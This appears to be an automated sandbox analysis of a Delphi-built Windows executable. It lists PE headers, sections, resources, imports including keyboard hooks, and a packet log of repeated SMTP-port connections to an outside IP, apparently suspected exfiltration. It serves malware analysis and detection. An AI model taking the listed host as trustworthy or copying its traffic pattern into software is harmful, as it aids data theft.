                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:4
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:08cf44088e151648126443381e7f459e
                                                                                                                                          Instruction
                                                                                                                                          push ebp
                                                                                                                                          mov ebp, esp
                                                                                                                                          add esp, FFFFFFF0h
                                                                                                                                          mov eax, 004596D0h
                                                                                                                                          call 00007FE880F36D91h
                                                                                                                                          mov eax, dword ptr [00583618h]
                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                          call 00007FE880F841B1h
                                                                                                                                          mov ecx, dword ptr [00583798h]
                                                                                                                                          mov eax, dword ptr [00583618h]
                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                          mov edx, dword ptr [00459508h]
                                                                                                                                          call 00007FE880F841B1h
                                                                                                                                          mov eax, dword ptr [00583618h]
                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                          call 00007FE880F84225h
                                                                                                                                          call 00007FE880F34C20h
                                                                                                                                          lea eax, dword ptr [eax+00h]
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1880000x25f4.idata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1940000x12e00.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x18d0000x6164.reloc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x18c0000x18.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x1887380x5e4.idata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          .text0x10000x589180x58a00c5095fa7b0b31f3066c395b0d1d18ab3False0.5273740523624824data6.540566508608764IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                          .itext0x5a0000x7e40x80067eca1f15095a0ab06a3e71544486964False0.62890625data6.182004210688925IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                          .data0x5b0000x1287b40x12880046670e29fe10a49ed1b5ffbdcd946ee3False0.7087851101391232data7.443226968023859IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .bss0x1840000x36700x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .idata0x1880000x25f40x2600eff6ca613b557f766154838c2000898eFalse0.3247327302631579data5.198920810498565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .tls0x18b0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .rdata0x18c0000x180x2004be143db2e0b6a8ec71d591c7b9f161fFalse0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .reloc0x18d0000x61640x620094f952c66f78ea5bdd327d392fc4a9d2False0.6551339285714286data6.695398381676511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                          .rsrc0x1940000x12e000x12e00ba908c0648cd85798902db3e9b2423b7False0.2046512831125828data3.922411598134611IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                          RT_CURSOR0x194b540x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                          RT_CURSOR0x194c880x134dataEnglishUnited States0.4642857142857143
                                                                                                                                          RT_CURSOR0x194dbc0x134dataEnglishUnited States0.4805194805194805
                                                                                                                                          RT_CURSOR0x194ef00x134dataEnglishUnited States0.38311688311688313
                                                                                                                                          RT_CURSOR0x1950240x134dataEnglishUnited States0.36038961038961037
                                                                                                                                          RT_CURSOR0x1951580x134dataEnglishUnited States0.4090909090909091
                                                                                                                                          RT_CURSOR0x19528c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                          RT_BITMAP0x1953c00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                          RT_BITMAP0x1955900x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                                          RT_BITMAP0x1957740x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                          RT_BITMAP0x1959440x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                                          RT_BITMAP0x195b140x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                                          RT_BITMAP0x195ce40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                                          RT_BITMAP0x195eb40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                                          RT_BITMAP0x1960840x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                          RT_BITMAP0x1962540x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                                          RT_BITMAP0x1964240x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                          RT_BITMAP0x1965f40xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                                          RT_ICON0x1966dc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 11811 x 11811 px/m0.3962765957446808
                                                                                                                                          RT_ICON0x196b440x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 11811 x 11811 px/m0.27909836065573773
                                                                                                                                          RT_ICON0x1974cc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 11811 x 11811 px/m0.2178705440900563
                                                                                                                                          RT_ICON0x1985740x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 11811 x 11811 px/m0.14875231053604437
                                                                                                                                          RT_ICON0x19d9fc0x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 11811 x 11811 px/m0.14462406015037593
                                                                                                                                          RT_DIALOG0x1a41e40x52data0.7682926829268293
                                                                                                                                          RT_DIALOG0x1a42380x52data0.7560975609756098
                                                                                                                                          RT_STRING0x1a428c0x170data0.4945652173913043
                                                                                                                                          RT_STRING0x1a43fc0x2b4data0.476878612716763
                                                                                                                                          RT_STRING0x1a46b00xb4data0.6888888888888889
                                                                                                                                          RT_STRING0x1a47640xe8data0.6422413793103449
                                                                                                                                          RT_STRING0x1a484c0x2a8data0.4764705882352941
                                                                                                                                          RT_STRING0x1a4af40x3e8data0.382
                                                                                                                                          RT_STRING0x1a4edc0x370data0.4022727272727273
                                                                                                                                          RT_STRING0x1a524c0x3ccdata0.33539094650205764
                                                                                                                                          RT_STRING0x1a56180x214data0.49624060150375937
                                                                                                                                          RT_STRING0x1a582c0xccdata0.6274509803921569
                                                                                                                                          RT_STRING0x1a58f80x194data0.5643564356435643
                                                                                                                                          RT_STRING0x1a5a8c0x3c4data0.3288381742738589
                                                                                                                                          RT_STRING0x1a5e500x338data0.42961165048543687
                                                                                                                                          RT_STRING0x1a61880x294data0.42424242424242425
                                                                                                                                          RT_RCDATA0x1a641c0x10data1.5
                                                                                                                                          RT_RCDATA0x1a642c0x2d8data0.7225274725274725
                                                                                                                                          RT_RCDATA0x1a67040x588Delphi compiled form 'TAniToolForm'0.422316384180791
                                                                                                                                          RT_GROUP_CURSOR0x1a6c8c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                          RT_GROUP_CURSOR0x1a6ca00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                          RT_GROUP_CURSOR0x1a6cb40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                          RT_GROUP_CURSOR0x1a6cc80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                          RT_GROUP_CURSOR0x1a6cdc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                          RT_GROUP_CURSOR0x1a6cf00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                          RT_GROUP_CURSOR0x1a6d040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                          RT_GROUP_ICON0x1a6d180x4cdata0.8421052631578947
                                                                                                                                          DLLImport
                                                                                                                                          oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                          user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                          kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                                          kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                          user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                          gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                                                                                          version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                          kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                                                          oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                                                          ole32.dllCoUninitialize, CoInitialize
                                                                                                                                          kernel32.dllSleep
                                                                                                                                          oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                                          comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                                          uRLFileProtocolHandlerA
                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                          EnglishUnited States
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jan 24, 2024 21:31:55.927943945 CET49729443192.168.2.413.107.139.11
                                                                                                                                          Jan 24, 2024 21:31:55.928025007 CET4434972913.107.139.11192.168.2.4
                                                                                                                                          Jan 24, 2024 21:31:55.928117037 CET49729443192.168.2.413.107.139.11
                                                                                                                                          Jan 24, 2024 21:31:55.928493023 CET49729443192.168.2.413.107.139.11
                                                                                                                                          Jan 24, 2024 21:31:55.928607941 CET4434972913.107.139.11192.168.2.4
                                                                                                                                          Jan 24, 2024 21:31:55.928790092 CET49729443192.168.2.413.107.139.11
                                                                                                                                          Jan 24, 2024 21:31:55.970760107 CET49730443192.168.2.413.107.139.11
                                                                                                                                          Jan 24, 2024 21:31:55.970838070 CET4434973013.107.139.11192.168.2.4
                                                                                                                                          Jan 24, 2024 21:31:55.971120119 CET49730443192.168.2.413.107.139.11
                                                                                                                                          Jan 24, 2024 21:31:55.974508047 CET49730443192.168.2.413.107.139.11
                                                                                                                                          Jan 24, 2024 21:31:55.974586964 CET4434973013.107.139.11192.168.2.4
                                                                                                                                          Jan 24, 2024 21:31:56.368331909 CET4434973013.107.139.11192.168.2.4
                                                                                                                                          Jan 24, 2024 21:31:56.368535042 CET49730443192.168.2.413.107.139.11
                                                                                                                                          Jan 24, 2024 21:31:56.371516943 CET49730443192.168.2.413.107.139.11
                                                                                                                                          Jan 24, 2024 21:31:56.371567965 CET4434973013.107.139.11192.168.2.4
                                                                                                                                          Jan 24, 2024 21:31:56.371988058 CET4434973013.107.139.11192.168.2.4
                                                                                                                                          Jan 24, 2024 21:31:56.424204111 CET49730443192.168.2.413.107.139.11
                                                                                                                                          Jan 24, 2024 21:31:56.443826914 CET49730443192.168.2.413.107.139.11
                                                                                                                                          Jan 24, 2024 21:31:56.485944986 CET4434973013.107.139.11192.168.2.4
                                                                                                                                          Jan 24, 2024 21:31:56.840583086 CET4434973013.107.139.11192.168.2.4
                                                                                                                                          Jan 24, 2024 21:31:56.840802908 CET4434973013.107.139.11192.168.2.4
                                                                                                                                          Jan 24, 2024 21:31:56.840974092 CET49730443192.168.2.413.107.139.11
                                                                                                                                          Jan 24, 2024 21:31:56.842767954 CET49730443192.168.2.413.107.139.11
                                                                                                                                          Jan 24, 2024 21:31:56.842828989 CET4434973013.107.139.11192.168.2.4
                                                                                                                                          Jan 24, 2024 21:31:56.842875957 CET49730443192.168.2.413.107.139.11
                                                                                                                                          Jan 24, 2024 21:31:56.842894077 CET4434973013.107.139.11192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:01.086843014 CET49732443192.168.2.4173.231.16.75
                                                                                                                                          Jan 24, 2024 21:32:01.086925030 CET44349732173.231.16.75192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:01.087007046 CET49732443192.168.2.4173.231.16.75
                                                                                                                                          Jan 24, 2024 21:32:01.100971937 CET49732443192.168.2.4173.231.16.75
                                                                                                                                          Jan 24, 2024 21:32:01.101007938 CET44349732173.231.16.75192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:01.582357883 CET44349732173.231.16.75192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:01.582588911 CET49732443192.168.2.4173.231.16.75
                                                                                                                                          Jan 24, 2024 21:32:01.584274054 CET49732443192.168.2.4173.231.16.75
                                                                                                                                          Jan 24, 2024 21:32:01.584300995 CET44349732173.231.16.75192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:01.584731102 CET44349732173.231.16.75192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:01.626107931 CET49732443192.168.2.4173.231.16.75
                                                                                                                                          Jan 24, 2024 21:32:01.660155058 CET49732443192.168.2.4173.231.16.75
                                                                                                                                          Jan 24, 2024 21:32:01.705900908 CET44349732173.231.16.75192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:01.877016068 CET44349732173.231.16.75192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:01.877100945 CET44349732173.231.16.75192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:01.877162933 CET49732443192.168.2.4173.231.16.75
                                                                                                                                          Jan 24, 2024 21:32:01.885267019 CET49732443192.168.2.4173.231.16.75
                                                                                                                                          Jan 24, 2024 21:32:03.321365118 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:03.523353100 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:03.523458004 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:03.750426054 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:03.750741005 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:03.953141928 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:03.953315973 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:04.156770945 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:04.157536030 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:04.370861053 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:04.370923042 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:04.370964050 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:04.371007919 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:04.371120930 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:04.371120930 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:04.373204947 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:04.407224894 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:04.609428883 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:04.622334957 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:04.824451923 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:04.825787067 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:05.028372049 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:05.028685093 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:05.258574963 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:05.258853912 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:05.460813046 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:05.461158037 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:05.675802946 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:05.676090956 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:05.877872944 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:05.878406048 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:05.878470898 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:05.878506899 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:05.878540039 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:06.080343962 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:06.080430031 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:06.080466032 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:06.080502033 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:06.083410025 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:06.124089003 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:06.157639980 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:06.360555887 CET58749733185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:06.360975027 CET49733587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:06.362529993 CET49734587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:06.571562052 CET58749734185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:06.571886063 CET49734587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:06.793358088 CET58749734185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:06.793535948 CET49734587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:07.003293991 CET58749734185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:07.003446102 CET49734587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:07.213927031 CET58749734185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:07.214423895 CET49734587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:07.435010910 CET58749734185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:07.435072899 CET58749734185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:07.435112000 CET58749734185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:07.435149908 CET58749734185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:07.435283899 CET49734587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:07.435283899 CET49734587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:07.437074900 CET58749734185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:07.438446045 CET49734587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:07.647855997 CET58749734185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:07.648838043 CET49734587192.168.2.4185.56.136.50
